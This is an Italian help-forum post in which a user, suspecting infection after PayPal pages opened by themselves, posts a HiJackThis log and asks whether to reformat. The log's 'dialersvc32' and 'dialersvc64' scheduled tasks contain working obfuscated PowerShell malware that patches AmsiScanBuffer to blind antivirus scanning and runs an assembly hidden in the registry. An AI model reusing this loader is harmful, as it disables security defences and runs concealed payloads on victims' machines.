Benvenuto Ospite Cerca | Topic Attivi | Utenti | | Log In | Registra

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » problemone !

problemone ! Opzioni
Topic Precedente · Topic Sucessivo
booble
Inviato: Tuesday, June 27, 2023 11:52:11 PM
Rank: AiutAmico

Iscritto dal : 10/15/2006
Posts: 59
Ciao Raga , ho trovato delle pagine aperte di paypal e e' successo poco dopo che ho scaricato un file... ho fatto i vari passaggi come spiegate e vi posto il log hj : GRAZIE MILLE !! SECONDO VOI MEGLIO FORMATTARE?

Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.13

Platform: x64 Windows 10 (Pro), 10.0.19045.3086 (ReleaseId: 2009, 22H2), Service Pack: 0
Time: 27.06.2023 - 23:46 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Elevated: Yes
Ran by: hopon (group: Administrators) on DESKTOP-GT110CG, FirstRun: no

Firefox: 114.0.2.8570
Internet Explorer: 11.0.19041.1566
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe
1 C:\Program Files (x86)\ExpressVPN\xvpnd\xvpnd.exe
1 C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
1 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
1 C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
2 C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1 C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.23042.108.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
1 C:\Program Files\WindowsApps\Microsoft.ZuneMusic_11.2304.2.0_x64__8wekyb3d8bbwe\Microsoft.Media.Player.exe
1 C:\Users\hopon\Downloads\hijackthis-2.10.0.13-installer.exe
1 C:\Windows\explorer.exe
1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\drivers\AdminService.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\igfxEM.exe
1 C:\Windows\System32\igfxHK.exe
1 C:\Windows\System32\igfxTray.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\oobe\UserOOBEBroker.exe
5 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
74 C:\Windows\System32\svchost.exe
2 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

O2-32 - HKLM\..\BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2-32 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O4 - HKCU\..\Run: [Microsoft Edge Update] = C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\1.3.175.29\MicrosoftEdgeUpdateCore.exe
O4 - HKCU\..\StartupApproved\Run: [com.messenger] = C:\Users\hopon\AppData\Local\Programs\Messenger\Messenger.exe messenger://openAtLogin (2023/03/18)
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_3B883C8A669759C07FF05476B1832F7D] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start /prefetch:5 (2023/03/18)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Append to existing PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert link target to Adobe PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert link target to existing PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert to Adobe PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O17 - DHCP DNS 1: 192.168.1.1
O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\WINDOWS\system32\acaptuser64.dll (disabled by SecureBoot)
O20-32 - HKLM\..\Windows: [AppInit_DLLs] = acaptuser32.dll (file missing) (disabled by SecureBoot)
O22 - BITS Job: (download) {17311897-CA6B-49A4-A595-FBD7ADB59052} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0.1/update/win64/it/firefox-112.0.2-113.0.1.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {2BCCD00F-4AA8-4CF4-9304-9CE9A9F198E8} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0.1/update/win64/it/firefox-112.0.2-113.0.1.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {B4C74C95-4F95-4A4E-AA15-F178C31663FF} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/112.0.2/update/win64/it/firefox-112.0.1-112.0.2.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {C950926D-46EA-41ED-93E4-83341C6CD12E} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0/update/win64/it/firefox-112.0.2-113.0.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1899887094-371431486-2153575249-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Clip\LicenseImdsIntegration - C:\WINDOWS\system32\fclip.exe (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Meta\Messenger-SL-Helper-S-1-5-21-1899887094-371431486-2153575249-1001 - C:\Users\hopon\AppData\Local\Programs\Messenger\MessengerHelper.exe --lassie
O22 - Task: \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (Microsoft)
O22 - Task: \Microsoft\Windows\PI\SecureBootEncodeUEFI - C:\WINDOWS\system32\SecureBootEncodeUEFI.exe (Microsoft)
O22 - Task: \Microsoft\Windows\WindowsUpdate\RUXIM\PLUGScheduler - C:\Program Files\RUXIM\PLUGscheduler.exe (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: dialersvc32 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:GfYQBaZTkiMV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qBqrVrPENDaUrP,[Parameter(Position=1)][Type]$ItuNrcQARM)$JEuWvSuiJgq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'te'+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+'yM'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+',P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+',Se'+'a'+''+'l'+''+'e'+'d'+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+'to'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JEuWvSuiJgq.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pec'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$qBqrVrPENDaUrP).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+'e'+','+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$JEuWvSuiJgq.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'ke',''+[Char](80)+'u'+[Char](98)+''+'l'+'i'+'c'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+'al',$ItuNrcQARM,$qBqrVrPENDaUrP).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $JEuWvSuiJgq.CreateType();}$pPtWWRwBiiSpU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'p'+'P'+'t'+'W'+''+'W'+''+[Char](82)+''+[Char](119)+'B'+[Char](105)+''+'i'+''+[Char](83)+''+'p'+''+[Char](85)+'');$TQlHHTrKodKNiA=$pPtWWRwBiiSpU.GetMethod('T'+[Char](81)+'l'+[Char](72)+''+[Char](72)+'T'+'r'+''+[Char](75)+'od'+[Char](75)+''+[Char](78)+'i'+[Char](65)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vjnVUvyUbmipHVmkmCb=GfYQBaZTkiMV @([String])([IntPtr]);$fTcPsnmozntvWtMGuGjiYI=GfYQBaZTkiMV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ifDAILfodQV=$pPtWWRwBiiSpU.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+'od'+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+''+'3'+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$FUBgklRKLaEUAa=$TQlHHTrKodKNiA.Invoke($Null,@([Object]$ifDAILfodQV,[Object](''+'L'+'o'+[Char](97)+'d'+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$bavqxfAkfrEOMrORZ=$TQlHHTrKodKNiA.Invoke($Null,@([Object]$ifDAILfodQV,[Object](''+[Char](86)+'irt'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+'rotect')));$etckWfT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FUBgklRKLaEUAa,$vjnVUvyUbmipHVmkmCb).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$twkDHQLBMVKbiALWw=$TQlHHTrKodKNiA.Invoke($Null,@([Object]$etckWfT,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$LoWhXVqjUr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bavqxfAkfrEOMrORZ,$fTcPsnmozntvWtMGuGjiYI).Invoke($twkDHQLBMVKbiALWw,[uint32]8,4,[ref]$LoWhXVqjUr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$twkDHQLBMVKbiALWw,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bavqxfAkfrEOMrORZ,$fTcPsnmozntvWtMGuGjiYI).Invoke($twkDHQLBMVKbiALWw,[uint32]8,0x20,[ref]$LoWhXVqjUr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'FT'+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
O22 - Task: dialersvc64 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:NsfwDhXzXXMa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yUjkXQUrIUaHSB,[Parameter(Position=1)][Type]$bPjFVYrKGX)$BLSqrzUoYKB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$BLSqrzUoYKB.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$yUjkXQUrIUaHSB).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$BLSqrzUoYKB.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+'g'+','+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$bPjFVYrKGX,$yUjkXQUrIUaHSB).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $BLSqrzUoYKB.CreateType();}$lNlbcIlpZLPMI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+'o'+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+'2'+'.'+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+'e'+''+[Char](108)+'N'+[Char](108)+''+[Char](98)+''+[Char](99)+'I'+'l'+'pZ'+[Char](76)+''+[Char](80)+''+[Char](77)+'I');$ZlbrnqiQwtaXll=$lNlbcIlpZLPMI.GetMethod(''+[Char](90)+''+'l'+''+'b'+''+[Char](114)+'n'+[Char](113)+''+[Char](105)+''+'Q'+''+[Char](119)+'t'+'a'+''+[Char](88)+'l'+[Char](108)+'',[Reflection.BindingFlags]'Pub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'ta'+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oSLXIGPhUBwcPObiLHA=NsfwDhXzXXMa @([String])([IntPtr]);$NWhrWYOnyMiHXMKHxgWgdl=NsfwDhXzXXMa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cXyqiSktqYz=$lNlbcIlpZLPMI.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+'odu'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'n'+'e'+'l3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$xcfmHJQDqKEiYY=$ZlbrnqiQwtaXll.Invoke($Null,@([Object]$cXyqiSktqYz,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$pdFuLxHpDNMeZGiXb=$ZlbrnqiQwtaXll.Invoke($Null,@([Object]$cXyqiSktqYz,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+'o'+''+'t'+'e'+[Char](99)+''+'t'+'')));$cJsJUIl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xcfmHJQDqKEiYY,$oSLXIGPhUBwcPObiLHA).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+'l');$SKknpZvLjdDBryCBn=$ZlbrnqiQwtaXll.Invoke($Null,@([Object]$cJsJUIl,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$uOSfcVDwXC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pdFuLxHpDNMeZGiXb,$NWhrWYOnyMiHXMKHxgWgdl).Invoke($SKknpZvLjdDBryCBn,[uint32]8,4,[ref]$uOSfcVDwXC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SKknpZvLjdDBryCBn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pdFuLxHpDNMeZGiXb,$NWhrWYOnyMiHXMKHxgWgdl).Invoke($SKknpZvLjdDBryCBn,[uint32]8,0x20,[ref]$uOSfcVDwXC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
O22 - Task: FreedomeHelper - C:\Program Files (x86)\F-Secure\Freedome\FHelper.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineQC - C:\Program Files\Google\Chrome\updater.exe (file missing)
O22 - Task: MicrosoftEdgeUpdateTaskUserS-1-5-21-1899887094-371431486-2153575249-1001Core{C73AB81E-3916-49D5-BCEA-ADB09B5196F0} - C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c
O22 - Task: MicrosoftEdgeUpdateTaskUserS-1-5-21-1899887094-371431486-2153575249-1001UA{8A1D8DAD-C112-453D-9F55-10F6E5FAE916} - C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler
O22 - Task: OneDrive Reporting Task-S-1-5-21-1899887094-371431486-2153575249-1001 - C:\Users\hopon\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: RtHDVBg - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
O22 - Task: RtHDVBg_ListenToDevice - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /AECBYLISTENTOSTATUS
O22 - Task: RTKCPL - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
O23 - Service R2: AtherosSvc - C:\WINDOWS\System32\drivers\AdminService.exe
O23 - Service R2: ExpressVPN Service - (ExpressVPNService) - C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService1.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service S2: Launcher Service: player - (player) - C:\ProgramData\playersclub\LaunchServ.exe
O23 - Service S3: FLEXnet Licensing Service - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE


--
End of file - Time spent: 32,8 sec. - 44854 bytes, CRC32: FFFFFFFF. Sign: ഒ�
Torna in alto
 
Sponsor
Inviato: Tuesday, June 27, 2023 11:52:11 PM

 
Torna in alto
 
Utenti presenti in questo topic
Guest

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » problemone !


Salta al Forum
Aggiunta nuovi Topic disabilitata in questo forum.
Risposte disabilitate in questo forum.
Eliminazione tuoi Post disabilitata in questo forum.
Modifica dei tuoi post disabilitata in questo forum.
Creazione Sondaggi disabilitata in questo forum.
Voto ai sondaggi disabilitato in questo forum.

Main Forum RSS : RSS

Aiutamici Theme
Powered by Yet Another Forum.net versione 1.9.1.8 (NET v2.0) - 3/29/2008
Copyright © 2003-2008 Yet Another Forum.net. All rights reserved.